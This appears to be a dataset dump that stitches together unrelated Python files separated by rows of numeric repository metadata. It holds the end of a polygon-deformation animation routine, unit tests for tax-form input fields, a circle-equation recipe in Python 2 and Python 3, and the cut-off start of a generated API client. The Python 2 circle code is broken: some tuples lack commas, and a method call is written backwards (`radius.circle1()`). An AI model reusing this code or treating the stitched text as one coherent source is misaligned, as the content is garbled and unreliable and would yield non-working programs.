for j in range(len(tree)):
x_deformed_array = numpy.array([[0,0]])
for k in range(0,len(t_new)):
x_deformed, x_deformedd, x_deformeddd = polygonDiffeo(numpy.array([[x_to_animate[-1][k],y_to_animate[-1][k]]]), tree[j], DiffeoParams)
x_deformed_array = numpy.vstack((x_deformed_array, x_deformed))
x_deformed_array = x_deformed_array[1:][:].transpose()
x_to_animate = numpy.vstack((x_to_animate,x_deformed_array[0][:]))
y_to_animate = numpy.vstack((y_to_animate,x_deformed_array[1][:]))
x_to_animate = numpy.vstack((x_to_animate,x_deformed_array[0][:]))
y_to_animate = numpy.vstack((y_to_animate,x_deformed_array[1][:]))
# # Iterate through the tree for the grid points
# x_to_animate_grid = [None]*len(x_grid)
# y_to_animate_grid = [None]*len(y_grid)
# for i in range(0,len(x_grid)):
# x_to_animate_grid[i] = numpy.array([x_grid[i]])
# y_to_animate_grid[i] = numpy.array([y_grid[i]])
# for j in range(len(tree)):
# x_deformed_array_grid = numpy.array([[0,0]])
# for k in range(0,len(x_grid[i])):
# x_deformed_grid, x_deformedd_gri, x_deformeddd_grid = triangleDiffeo(numpy.array([[x_to_animate_grid[i][-1][k],y_to_animate_grid[i][-1][k]]]), tree[j], DiffeoParams)
# x_deformed_array_grid = numpy.vstack((x_deformed_array_grid, x_deformed_grid))
# x_deformed_array_grid = x_deformed_array_grid[1:][:].transpose()
# x_to_animate_grid[i] = numpy.vstack((x_to_animate_grid[i],x_deformed_array_grid[0][:]))
# y_to_animate_grid[i] = numpy.vstack((y_to_animate_grid[i],x_deformed_array_grid[1][:]))
# x_to_animate_grid[i] = numpy.vstack((x_to_animate_grid[i],x_deformed_array_grid[0][:]))
# y_to_animate_grid[i] = numpy.vstack((y_to_animate_grid[i],x_deformed_array_grid[1][:]))
def update(i):
# Find the index to consider
index_to_consider = int(numpy.floor(i/FramesPerPolygon))
label = 'Purging polygon {0}'.format(index_to_consider+1)
# Animate data
xy_plot.set_xdata(((i%FramesPerPolygon)/FramesPerPolygon)*x_to_animate[index_to_consider+1][:] + (1-((i%FramesPerPolygon)/FramesPerPolygon))*x_to_animate[index_to_consider][:])
xy_plot.set_ydata(((i%FramesPerPolygon)/FramesPerPolygon)*y_to_animate[index_to_consider+1][:] + (1-((i%FramesPerPolygon)/FramesPerPolygon))*y_to_animate[index_to_consider][:])
# for j in range(0,len(x_grid)):
# xy_grid[j].set_xdata(((i%FramesPerPolygon)/FramesPerPolygon)*x_to_animate_grid[j][index_to_consider+1][:] + (1-((i%FramesPerPolygon)/FramesPerPolygon))*x_to_animate_grid[j][index_to_consider][:])
# xy_grid[j].set_ydata(((i%FramesPerPolygon)/FramesPerPolygon)*y_to_animate_grid[j][index_to_consider+1][:] + (1-((i%FramesPerPolygon)/FramesPerPolygon))*y_to_animate_grid[j][index_to_consider][:])
ax.set_xlabel(label)
if SaveOption == True:
fig.savefig('./../../data/visualizations/figure_' + str(i) + '.pdf', bbox_inches='tight')
return xy_plot, ax
# Initialize FuncAnimation object
anim = FuncAnimation(fig, update, frames=numpy.arange(0, 1+FramesPerPolygon*len(tree)), interval=TimeInterval)
if SaveOption == True:
anim.save('./../../data/visualizations/diffeomorphism_convex.gif', dpi=80, writer='imagemagick')
else:
plt.show()
return
| 58.535984
| 456
| 0.705798
| 14,011
| 85,404
| 4.205053
| 0.038969
| 0.013069
| 0.009267
| 0.009709
| 0.894275
| 0.873873
| 0.860244
| 0.847956
| 0.838043
| 0.831526
| 0
| 0.093125
| 0.09886
| 85,404
| 1,459
| 457
| 58.535984
| 0.672419
| 0.520222
| 0
| 0.762923
| 0
| 0
| 0.013072
| 0.004318
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026738
| false
| 0
| 0.016043
| 0
| 0.069519
| 0.008913
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d1386cb6d46469516e5ec8b9aa204c83a35dde96
| 11,845
|
py
|
Python
|
webapp/tests/forms/test_fields.py
|
digitalservice4germany/steuerlotse
|
ef3e094e4d7d4768431a50ac4be60672cd03221d
|
[
"MIT"
] | 20
|
2021-07-02T07:49:08.000Z
|
2022-03-18T22:26:10.000Z
|
webapp/tests/forms/test_fields.py
|
digitalservice4germany/steuerlotse
|
ef3e094e4d7d4768431a50ac4be60672cd03221d
|
[
"MIT"
] | 555
|
2021-06-28T15:35:15.000Z
|
2022-03-31T11:51:55.000Z
|
webapp/tests/forms/test_fields.py
|
digitalservice4germany/steuerlotse
|
ef3e094e4d7d4768431a50ac4be60672cd03221d
|
[
"MIT"
] | 1
|
2021-07-04T20:34:12.000Z
|
2021-07-04T20:34:12.000Z
|
import unittest
import datetime as dt
from werkzeug.datastructures import MultiDict
from app.forms import SteuerlotseBaseForm
from app.forms.fields import IdNrField, SteuerlotseDateField, UnlockCodeField, _add_classes_to_kwargs
from app.forms.validations.validators import ValidIdNr
class TestAddClassesToKwargs(unittest.TestCase):
def test_if_kwargs_is_empty_and_one_class_then_set_correctly(self):
kwargs = {}
classes = ['one_class']
correct_classes = 'one_class'
_add_classes_to_kwargs(kwargs, classes)
self.assertEqual(correct_classes, kwargs.get('class'))
def test_if_kwargs_is_empty_and_many_classes_then_set_correctly(self):
kwargs = {}
classes = ['one_class', 'second_class', 'third_class']
correct_classes = 'one_class second_class third_class'
_add_classes_to_kwargs(kwargs, classes)
self.assertEqual(correct_classes, kwargs.get('class'))
def test_if_kwargs_is_not_empty_and_one_class_then_set_correctly(self):
kwargs = {'class': 'old_class'}
classes = ['one_class']
correct_classes = 'old_class one_class'
_add_classes_to_kwargs(kwargs, classes)
self.assertEqual(correct_classes, kwargs.get('class'))
def test_if_kwargs_is_not_empty_and_many_classes_then_set_correctly(self):
kwargs = {'class': 'old_class'}
classes = ['one_class', 'second_class', 'third_class']
correct_classes = 'old_class one_class second_class third_class'
_add_classes_to_kwargs(kwargs, classes)
self.assertEqual(correct_classes, kwargs.get('class'))
class IdNrForm(SteuerlotseBaseForm):
idnr_field = IdNrField(validators=[ValidIdNr()])
class TestIdNrFieldData(unittest.TestCase):
def setUp(self):
self.form = IdNrForm()
def test_if_no_data_and_no_formdata_given_then_return_none(self):
""" Simulates a GET request without prefilled data."""
self.form.process()
self.assertEqual(None, self.form.idnr_field.data)
def test_if_data_given_and_no_formdata_then_store_data_as_is(self):
""" Simulates a GET request with prefilled data."""
prefilled_idnr = '02259674819'
self.form.process(data={'idnr_field': prefilled_idnr})
self.assertEqual(prefilled_idnr, self.form.idnr_field.data)
def test_if_no_data_given_and_invalid_formdata_then_store_form_data_as_is(self):
""" Simulates a POST request with invalid formdata and no prefilled data."""
wrong_idnr_input = ['02', '259', '67', '819']
self.form.process(formdata=MultiDict({'idnr_field': wrong_idnr_input}))
self.form.validate()
self.assertEqual(wrong_idnr_input, self.form.idnr_field.data)
def test_if_no_data_given_and_valid_formdata_then_store_form_data_as_string(self):
""" Simulates a POST request with valid formdata and no prefilled data."""
correct_idnr_input = ['02', '259', '674', '819']
self.form.process(formdata=MultiDict({'idnr_field': correct_idnr_input}))
self.form.validate()
self.assertEqual('02259674819', self.form.idnr_field.data)
def test_if_data_given_and_invalid_formdata_then_store_form_data_as_is(self):
""" Simulates a POST request with invalid formdata and prefilled data."""
wrong_idnr_input = ['02', '259', '67', '819']
self.form.process(formdata=MultiDict({'idnr_field': wrong_idnr_input}), data={'idnr_field': '04452397687'})
self.form.validate()
self.assertEqual(wrong_idnr_input, self.form.idnr_field.data)
def test_if_data_given_and_valid_formdata_then_store_form_data_as_string(self):
""" Simulates a POST request with valid formdata and prefilled data."""
correct_idnr_input = ['02', '259', '674', '819']
self.form.process(formdata=MultiDict({'idnr_field': correct_idnr_input}), data={'idnr_field': '04452397687'})
self.form.validate()
self.assertEqual('02259674819', self.form.idnr_field.data)
class TestIdNrFieldValue(unittest.TestCase):
def setUp(self):
self.form = IdNrForm()
def test_if_no_data_and_no_formdata_given_then_value_equals_empty_list(self):
""" Simulates a GET request without prefilled data."""
self.form.process()
self.assertEqual([], self.form.idnr_field._value())
def test_if_data_given_and_no_formdata_then_value_equals_list_of_data(self):
""" Simulates a GET request with prefilled data."""
prefilled_idnr = '02259674819'
self.form.process(data={'idnr_field': prefilled_idnr})
self.assertEqual(['02', '259', '674', '819'], self.form.idnr_field._value())
def test_if_no_data_given_and_invalid_formdata_then_value_equals_formdata_as_is(self):
""" Simulates a POST request with invalid formdata and no prefilled data."""
wrong_idnr_input = ['02', '259', '67', '819']
self.form.process(formdata=MultiDict({'idnr_field': wrong_idnr_input}))
self.form.validate()
self.assertEqual(wrong_idnr_input, self.form.idnr_field._value())
def test_if_no_data_given_and_valid_formdata_then_value_equals_formdata_as_is(self):
""" Simulates a POST request with valid formdata and no prefilled data."""
correct_idnr_input = ['02', '259', '674', '819']
self.form.process(formdata=MultiDict({'idnr_field': correct_idnr_input}))
self.form.validate()
self.assertEqual(correct_idnr_input, self.form.idnr_field._value())
def test_if_data_given_and_invalid_formdata_then_value_equals_formdata_as_is(self):
""" Simulates a POST request with invalid formdata and prefilled data."""
wrong_idnr_input = ['02', '259', '67', '819']
self.form.process(formdata=MultiDict({'idnr_field': wrong_idnr_input}), data={'idnr_field': '04452397687'})
self.form.validate()
self.assertEqual(wrong_idnr_input, self.form.idnr_field._value())
def test_if_data_given_and_valid_formdata_then_value_equals_form_data_as_is(self):
""" Simulates a POST request with valid formdata and prefilled data."""
correct_idnr_input = ['02', '259', '674', '819']
self.form.process(formdata=MultiDict({'idnr_field': correct_idnr_input}), data={'idnr_field': '04452397687'})
self.form.validate()
self.assertEqual(correct_idnr_input, self.form.idnr_field._value())
class DateForm(SteuerlotseBaseForm):
date_field = SteuerlotseDateField()
class TestSteuerlotseDateFieldData(unittest.TestCase):
def setUp(self):
self.form = DateForm()
def test_if_no_data_and_no_formdata_given_then_return_none(self):
""" Simulates a GET request without prefilled data."""
self.form.process()
self.assertEqual(None, self.form.date_field.data)
def test_if_data_given_and_no_formdata_then_store_data_as_is(self):
""" Simulates a GET request with prefilled data."""
prefilled_date = dt.date(1980, 7, 31)
self.form.process(data={'date_field': prefilled_date})
self.assertEqual(prefilled_date, self.form.date_field.data)
def test_if_no_data_given_and_invalid_formdata_then_return_none(self):
""" Simulates a POST request with invalid formdata and no prefilled data."""
wrong_date_input = ['77', '07', '1980']
self.form.process(formdata=MultiDict({'date_field': wrong_date_input}))
self.form.validate()
self.assertEqual(None, self.form.date_field.data)
def test_if_no_data_given_and_valid_formdata_then_store_form_data_as_string(self):
""" Simulates a POST request with valid formdata and no prefilled data."""
correct_date_input = ['31', '07', '1980']
self.form.process(formdata=MultiDict({'date_field': correct_date_input}))
self.form.validate()
self.assertEqual(dt.date(1980, 7, 31), self.form.date_field.data)
def test_if_data_given_and_invalid_formdata_then_return_none(self):
""" Simulates a POST request with invalid formdata and prefilled data."""
wrong_date_input = ['77', '07', '1980']
self.form.process(formdata=MultiDict({'date_field': wrong_date_input}),
data={'date_field': dt.date(1979, 9, 19)})
self.form.validate()
self.assertEqual(None, self.form.date_field.data)
def test_if_data_given_and_valid_formdata_then_store_form_data_as_string(self):
""" Simulates a POST request with valid formdata and prefilled data."""
correct_date_input = ['31', '07', '1980']
self.form.process(formdata=MultiDict({'date_field': correct_date_input}),
data={'date_field': dt.date(1979, 9, 19)})
self.form.validate()
self.assertEqual(dt.date(1980, 7, 31), self.form.date_field.data)
class TestSteuerlotseDateFieldValue(unittest.TestCase):
def setUp(self):
self.form = DateForm()
def test_if_no_data_and_no_formdata_given_then_value_equals_empty_list(self):
""" Simulates a GET request without prefilled data."""
self.form.process()
self.assertEqual([], self.form.date_field._value())
def test_if_data_given_and_no_formdata_then_value_equals_list_of_data(self):
""" Simulates a GET request with prefilled data."""
prefilled_date = dt.date(1979, 9, 19)
self.form.process(data={'date_field': prefilled_date})
self.assertEqual(['19', '9', '1979'], self.form.date_field._value())
def test_if_no_data_given_and_invalid_formdata_then_value_equals_formdata_as_is(self):
""" Simulates a POST request with invalid formdata and no prefilled data."""
wrong_date_input = ['77', '07', '1980']
self.form.process(formdata=MultiDict({'date_field': wrong_date_input}))
self.form.validate()
self.assertEqual(wrong_date_input, self.form.date_field._value())
def test_if_no_data_given_and_valid_formdata_then_value_equals_formdata_as_is(self):
""" Simulates a POST request with valid formdata and no prefilled data."""
correct_date_input = ['31', '07', '1980']
self.form.process(formdata=MultiDict({'date_field': correct_date_input}))
self.form.validate()
self.assertEqual(['31', '7', '1980'], self.form.date_field._value())
def test_if_data_given_and_invalid_formdata_then_value_equals_formdata_as_is(self):
""" Simulates a POST request with invalid formdata and prefilled data."""
wrong_date_input = ['77', '07', '1980']
self.form.process(formdata=MultiDict({'date_field': wrong_date_input}),
data={'date_field': dt.date(1979, 9, 19)})
self.form.validate()
self.assertEqual(wrong_date_input, self.form.date_field._value())
def test_if_data_given_and_valid_formdata_then_value_equals_form_data_as_is(self):
""" Simulates a POST request with valid formdata and prefilled data."""
correct_date_input = ['31', '07', '1980']
self.form.process(formdata=MultiDict({'date_field': correct_date_input}),
data={'date_field': dt.date(1979, 9, 19)})
self.form.validate()
self.assertEqual(['31', '7', '1980'], self.form.date_field._value())
class UnlockCodeForm(SteuerlotseBaseForm):
unlock_code = UnlockCodeField()
class TestUnlockCodeFieldValue(unittest.TestCase):
def setUp(self):
self.form = UnlockCodeForm()
def test_if_data_given_and_lowercase_then_value_equals_uppercase_data(self):
""" Simulates a POST request with valid formdata and no prefilled data."""
unlock_input = ['aaaa', '12ade', '1l2ö']
self.form.process(formdata=MultiDict({'unlock_code': unlock_input}))
self.form.validate()
self.assertEqual(['AAAA', '12ADE', '1L2Ö'], self.form.unlock_code._value())
| 47.003968
| 117
| 0.703335
| 1,555
| 11,845
| 5.005145
| 0.067524
| 0.074007
| 0.033535
| 0.039316
| 0.904022
| 0.893743
| 0.885006
| 0.872543
| 0.870615
| 0.846075
| 0
| 0.034185
| 0.180076
| 11,845
| 251
| 118
| 47.191235
| 0.767195
| 0.12824
| 0
| 0.739645
| 0
| 0
| 0.080696
| 0
| 0
| 0
| 0
| 0
| 0.171598
| 1
| 0.201183
| false
| 0
| 0.035503
| 0
| 0.307692
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d169d83d374a231715492e655652d6700899cbdc
| 15,193
|
py
|
Python
|
recipes/Python/576531_Circle/recipe-576531.py
|
tdiprima/code
|
61a74f5f93da087d27c70b2efe779ac6bd2a3b4f
|
[
"MIT"
] | 2,023
|
2017-07-29T09:34:46.000Z
|
2022-03-24T08:00:45.000Z
|
recipes/Python/576531_Circle/recipe-576531.py
|
unhacker/code
|
73b09edc1b9850c557a79296655f140ce5e853db
|
[
"MIT"
] | 32
|
2017-09-02T17:20:08.000Z
|
2022-02-11T17:49:37.000Z
|
recipes/Python/576531_Circle/recipe-576531.py
|
unhacker/code
|
73b09edc1b9850c557a79296655f140ce5e853db
|
[
"MIT"
] | 780
|
2017-07-28T19:23:28.000Z
|
2022-03-25T20:39:41.000Z
|
#On the name of ALLAH and may the blessing and peace of Allah
#be upon the Messenger of Allah Mohamed Salla Allahu Aliahi Wassalam.
#Author :Fouad Teniou
#Date : 08/10/08
#Version : 2.4
""" Class of an equation of a circle of the form Ax^2 + Ay^2 + Dx + Ey + F = 0 (A !=0)
it represents a circle or a point or has no graph , depending of the radius value. And a class
of an equation for the circle of radius r and centred at point (x0,y0). """
import math
class Circle(object):
""" Class that represent an equation of a circle
with A,D,E,F constants properties """
def __init__(self, Avalue,Dvalue,Evalue,Fvalue):
""" Circle construction takes A,D,E,F Constants """
self.__A = float(Avalue)
self.__D = float(Dvalue)
self.__E = float(Evalue)
self.__F = float(Fvalue)
self._b = chr(253)
self._a = self._checkSign(self.__A)
self._d= self._checkSign(self.__D)
self._e = self._checkSign(self.__E)
self._f = self._checkSign(self.__F)
self._g = ((self.__D/self.__A)/2)
self._g1= self.__D/2
self._h =((self.__E/self.__A)/2)
self._h1 = self.__E/2
self._i = self._checkSign(self._g)
self._j = self._checkSign(self._h)
self._k = (-self.__F/self.__A + self._g**2 +self._h**2)
self._k1= (-self.__F + self._g1**2 +self._h1**2)
self._l = "%2.2f" % math.sqrt(abs(self._k))
self._l1 = "%2.2f" % math.sqrt(abs(self._k1))
self._m = "(x%s%s)%s+(y%s%s)%s = %s" % \
(self._i,self._g,self._b,self._j,self._h,self._b,self._k)
self._m1 = "(x%s%s)%s+(y%s%s)%s = %s" % \
(self._i,self._g1,self._b,self._j,self._h1,self._b,self._k1)
self._n = "(%s,%s)" % (-self._g,-self._h)
self._n1 = "(%s,%s)" % (-self._g1,-self._h1)
def __str__(self):
""" String representation of the circle equation,
standard form , centre and radius """
try:
math.sqrt(self._k)
#Circle raises zero degenerate case
assert math.sqrt(self._k) != 0,"The graph is the single point %s" % \
Circle.centre(self)
if self.__A == 0:
return "\n<Equation of a circle : x%s + y%s %s %sx %s %sy %s %s = 0 \
\n\n%s %35s %25s \n\n%s %22s %24s\n" %\
(self._b,self._b,self._d,int(self.D),self._e, \
int(self.E),self._f,int(self.F),
'Standard form','Centre(x0,y0)','Radius r' \
self._m1,Circle.centre(self),Circle.radius(self))
else:
return "\n<Equation of a circle : %sx%s + %sy%s %s %sx %s %sy %s %s = 0 \
\n\n%s %35s %25s \n\n%s %22s %24s\n" %\
(int(self.A)self._b,int(self.A),self._b,self._d,int(self.D),self._e, \
int(self.E),self._f,int(self.F),
'Standard form', 'Centre(x0,y0)','Radius r' \
self._m,Circle.centre(self),Circle.radius(self))
#Circle raises Negative number degenerate case
except ValueError:
raise ValueError,\
" r%s < 0 : Degenerate case has no graph" % self._b
def getA(self):
""" Get method for A attribute """
if self.__A != 0:
return self.__A
else:
raise ValueError,\
" A value should be different than zero "
def setA(self,value):
""" Set method for A attribute """
self.__A = value
def delA(self):
""" Delete method for A attribute """
del self.__A
#Create A property
A = property(getA,setA,delA,"A constant")
def getD(self):
""" Get method for D attribute """
return self.__D
def setD(self,value):
""" Set method for D attribute """
self.__D = value
def delD(self):
""" Delete method for D attribute """
del self.__D
#Create D property
D = property(getD,setD,delD,"D constant")
def getE(self):
""" Get method for E attribute """
return self.__E
def setE(self,value):
""" Set method for E attribute """
self.__E = value
def delE(self):
""" Delete method for E attribute """
del self.__E
#Create E property
E = property(getE,setE,delE,"E constant")
def getF(self):
""" Get method for F attribute """
return self.__F
def setF(self,value):
""" Set method for F attribute """
self.__F = value
def delF(self):
""" Delete method for F attribute """
del self.__F
#Create F property
F = property(getF,setF,delF,"F constant")
def _checkSign(self,value):
""" Utility method to check the values’ signs and return a sign string """
if value >= 0:
return "+"
else:
return ""
def radius(self):
""" Compute radius of a circle """
if self.__A == 1:
return self._l1
else:
return self._l
def centre(self):
""" Compute centre(x0,y0) of a circle """
if self.__A == 1:
return self._n1
else:
return self._n
class Equation(Circle):
"""Class that represent a radius and the centre of a circle """
def __init__(self,x,y,radius):
"""Equation construction takes centre(xValue,yValue
and radius"""
self.__x = float(x)
self.__y = float(y)
self.__radius = float(radius)
self._o = chr(253)
self._p = self.__radius**2
self._q = self._checkSign(-self.__x)
self._r = self._checkSign(-self.__y)
self._s = "(x%s%s)%s + (y%s%s)%s = %s " % \
(self._q,-self.__x,self._o,self._r,-self.__y,self._o,self._p)
self._t = self.__x**2 + self.__y**2 -self._p
self._u = self._checkSign(self._t)
self._v = "x%s + y%s %s %sx %s %sy %s %s = 0 " % \
(self._o,self._o,self._q,-self.__x*2,self._r,-self.__y*2,self._u,self._t)
def __str__(self):
""" String representation of the circle equation, standard form ,centre and radius """
#Equation raises radius value < 0
assert self.__radius > 0, "<Radius value should be greater than zero"
return ( "\n<Equation for the circle of radius (%s)\
centred at (%s,%s) is : \n\n%s < -- > %s" ) % \
(self.__radius,self.__x,self.__y,self._s,self._v)
if __name__ == "__main__":
circle1 = Circle(16,40,16,-7)
print circle1
#Though students might use only values of radius and circle
print radius.circle1()
print centre.circle1()
circle2 = Circle(2,24,0,-81)
print circle2
del circle2.A
circle2.A = 1
print circle2
equation = Equation(2,5,3)
print equation
for doc in (Circle.A,Circle.D,Circle.E,Circle.F):
print doc.__doc__,doc.fget.func_name,doc.fset.func_name,doc.fdel.func_name
########################################################################################
#Version : Python 3.2
#import math
#class Circle(object):
# """ Class that represent an equation of a circle
# with A,D,E,F constants properties"""
#
# def __init__(self,Avalue,Dvalue,Evalue,Fvalue):
# """ Circle constructor takes A,D,F,E constants """
#
# self.__A = float(Avalue)
# self.__D = float(Dvalue)
# self.__E = float(Evalue)
# self.__F = float(Fvalue)
#
# self._b = chr(178)
# self._a = self._checkSign(self.__A)
# self._d = self._checkSign(self.__D)
# self._e = self._checkSign(self.__E)
# self._f = self._checkSign(self.__F)
# self._g = ((self.__D/self.__A)/2)
# self._g1 = self.D/2
# self._h = ((self.__E/self.__A)/2)
# self._h1 = self.E/2
# self._i = self._checkSign(self._g)
# self._j = self._checkSign(self._h)
# self._k = (-self.__F/self.__A +self._g**2 + self._h**2)
# self._k1= (-self.__F +self._g1**2 + self._h1**2)
# self._l = "%2.2f" % math.sqrt(abs(self._k))
# self._l1= "%2.2f" % math.sqrt(abs(self._k1))
# self._m = "(x%s%s)%s+(y%s%s)%s = %s" % \
# (self._i,self._g,self._b,self._j,self._h,self._b,self._k)
# self._m1 ="(x%s%s)%s+(y%s%s)%s = %s" % \
# (self._i,self._g1,self._b,self._j,self._h1,self._b,self._k1)
# self._n = "(%s,%s)" % (-self._g,-self._h)
# self._n1= "(%s,%s)" % (-self._g1,-self._h1)
#
#
# def squared(self):
# self._w =(-self.__F/self.__A +((self.__D/self.__A)/2)**2 + ((self.__E/self.__A)/2)**2)
# return self._w
# def standardForm(self):
# return "(x%s%s)%s+(y%s%s)%s = %s" % \
# (self._checkSign(((self.__D/self.__A)/2)),((self.__D/self.__A)/2),chr(178),self._checkSign(((self.__E/self.__A)/2)),((self.__E/self.__A)/2),chr(178),(-self.__F/self.__A +((self.__D/self.__A)/2)**2 + ((self.__E/self.__A)/2)**2))
#
# def __str__(self):
# """ String representation of the circle equation,
# standard form, centre and radius"""
#
# try:
# math.sqrt(Circle.squared(self))
#
# #Circle raises zero degenerate case
# assert math.sqrt(Circle.squared(self)) != 0,"The graph is the single point %s" % \
# Circle.centre(self)
# if self.__A == 1:
#
# return "\n<Equation of a circle : x%s + y%s %s %sx %s %sy %s %s = 0 \
# \n\n%s %35s %25s \n\n%s %22s %24s\n" %\
# (self._b,self._b,self._d,int(self.D),self._e,\
# int(self.E),self._f,int(self.F),
# "Standard form","Center(x0,y0)","Radius r",\
# self._m1,Circle.centre(self),Circle.radius(self))
# else:
# return "\n<Equation of a circle : %sx%s + %sy%s %s %sx %s %sy %s %s = 0 \
# \n\n%s %35s %25s \n\n%s %22s %24s\n" %\
# (int(self.A),self._b,int(self.A),self._b,self._d,int(self.D),self._e,\
# int(self.E),self._f,int(self.F),
# "Standard form","Center(x0,y0)","Radius r",\
# Circle.standardForm(self),Circle.centre(self),Circle.radius(self))
#
# #Circle raises Negative number degenerate case
# except ValueError:
# raise ValueError("r%s < 0 : Degenerate case has no graph" % self._b)
#
# def getA(self):
# """ Get method for A attribute """
# if self.__A !=0:
# return self.__A
# else:
# raise ValueError("A value should be differtent than zero")
#
# def setA(self,value):
# """ Set method for A attribute """
#
# self.__A = value
#
# def delA(self):
# """Delete method for A attrobute"""
#
# del self.__A
#
# #Create a property
# A = property(getA,setA,delA,"A constant")
#
# def getD(self):
# """ Get method for D attribute """
#
# return self.__D
#
# def setD(self,value):
# """ Set method for D attribute """
#
# self.__D = value
#
# def delD(self):
# """Delete method for D attrobute"""
# del self.__D
#
# #Create a property
# D = property(getD,setD,delD,"D constant")
# def getE(self):
# """ Get method for E attribute """
# return self.__E
#
# def setE(self,value):
# """ Set method for E attribute """
#
# self.__E = value
#
# def delE(self):
# """Delete method for E attrobute"""
#
# del self.__E
#
# #Create a property
# E = property(getE,setE,delE,"E constant")
#
# def getF(self):
# """ Get method for F attribute """
#
# return self.__F
#
# def setF(self,value):
# """ Set method for F attribute """
#
# self.__F = value
#
# def delF(self):
# """Delete method for F attrobute"""
#
# del self.__F
#
# #Create a property
# F = property(getF,setF,delF,"F constant")
#
# def _checkSign(self,value):
# """ Utility method to check the values's sign
# and return a sign string"""
#
# if value >= 0:
# return "+"
# else :
# return ""
#
# def radius(self):
# """ Computes radius of a circle """
# if self.__A ==1:
# return self._l1
# else:
# return "%2.2f" % math.sqrt(abs(Circle.squared(self)))
#
# def centre(self):
# """ Computes centre(x0,y0) of a circle """
# if self.__A == 1:
# return self._n1
# else:
# return "(%s,%s)" % (-((self.__D/self.__A)/2),-((self.__E/self.__A)/2))
#
#
#
#class Equation(Circle):
# """ class that represent a radius and the centre of a circle """
#
# def __init__(self,x,y,radius):
# """ Equation construction takes centre(xValue,yValue)
# and radius """
#
# self.__x = float(x)
# self.__y = float(y)
# self.__radius = float(radius)
#
# self._o = chr(178)
# self._p = self.__radius**2
# self._q = self._checkSign(-self.__x)
# self._r = self._checkSign(-self.__y)
# self._s = "(x%s%s)%s+(y%s%s)%s = %s" % \
# (self._q,-self.__x,self._o,self._r,-self.__y,self._o,self._p)
# self._t = self.__x**2 + self.__y**2 - self._p
# self._u = self._checkSign(self._t)
# self._v = "x%s + y%s %s%sx %s%sy %s%s = 0" % \
# (self._o,self._o,self._q,-self.__x*2,self._r,-self.__y*2,self._u,self._t)
#
# def __str__(self):
# """ String representation of the circle equation, standard form,
# centre and radius"""
#
# #Equation raises radius value < 0
# assert self.__radius > 0, "<radius value should be greater than zero"
#
# return ("\n<Equation for the circle of radius (%s)\
# centred at(%s,%s) is :\n\n%s <--> %s") %\
# (self.__radius,self.__x,self.__y,self._s,self._v )
#
#
#if __name__ == "__main__":
# circle1 = Circle(10,40,16,-7)
# print(circle1)
#
# print(circle1.radius())
# print(circle1.centre())
# circle1.delA
# circle1.A=1
# print(circle1)
# circle3 = Circle(5,24,0,-81)
# print(circle3)
#
# circle3.E =80
# print(circle3)
#
# equation = Equation(2,5,3)
# print(equation)
#
#
# for doc in (Circle.A,Circle.D,Circle.E,Circle.F):
# print(doc.__doc__,"=",doc.fget.__name__,doc.fset.__name__,doc.fdel.__name__)
#######################################################################################
#<Equation of a circle : 10x² + 10y² + 40x + 16y -7 = 0
#Standard form Center(x0,y0) Radius r
#(x+2.0)²+(y+0.8)² = 5.34 (-2.0,-0.8) 2.31
#2.31
#(-2.0,-0.8)
#<Equation of a circle : x² + y² + 40x + 16y -7 = 0
#Standard form Center(x0,y0) Radius r
#(x+20.0)²+(y+8.0)² = 471.0 (-20.0,-8.0) 21.70
#<Equation of a circle : 5x² + 5y² + 24x + 0y -81 = 0
#Standard form Center(x0,y0) Radius r
#(x+2.4)²+(y+0.0)² = 21.96 (-2.4,-0.0) 4.69
#<Equation of a circle : 5x² + 5y² + 24x + 80y -81 = 0
#Standard form Center(x0,y0) Radius r
#(x+2.4)²+(y+8.0)² = 85.96 (-2.4,-8.0) 9.27
#<Equation for the circle of radius (3.0) centred at(2.0,5.0) is :
#(x-2.0)²+(y-5.0)² = 9.0 <--> x² + y² -4.0x -10.0y +20.0 = 0
#A constant = getA setA delA
#D constant = getD setD delD
#E constant = getE setE delE
#F constant = getF setF delF
| 30.26494
| 246
| 0.53992
| 2,246
| 15,193
| 3.427872
| 0.100178
| 0.014547
| 0.008183
| 0.024289
| 0.835693
| 0.817249
| 0.803871
| 0.797117
| 0.78127
| 0.78127
| 0
| 0.03589
| 0.279273
| 15,193
| 501
| 247
| 30.325349
| 0.667215
| 0.578556
| 0
| 0.145038
| 0
| 0.038168
| 0.085465
| 0
| 0
| 0
| 0
| 0
| 0.015267
| 0
| null | null | 0
| 0.007634
| null | null | 0.053435
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0f19873574132a123bbadc53479a8fa78004068e
| 24,533
|
py
|
Python
|
iqs_client/api/queries_api.py
|
thomas-bc/mms-autocref
|
1db6697f929a1c782c902923209389e337ec6961
|
[
"Apache-2.0"
] | null | null | null |
iqs_client/api/queries_api.py
|
thomas-bc/mms-autocref
|
1db6697f929a1c782c902923209389e337ec6961
|
[
"Apache-2.0"
] | null | null | null |
iqs_client/api/queries_api.py
|
thomas-bc/mms-autocref
|
1db6697f929a1c782c902923209389e337ec6961
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
IncQuery Server
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
OpenAPI spec version: 0.12.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from iqs_client.api_client import ApiClient
class QueriesApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def get_query_details(self, query_fqn, **kwargs): # noqa: E501
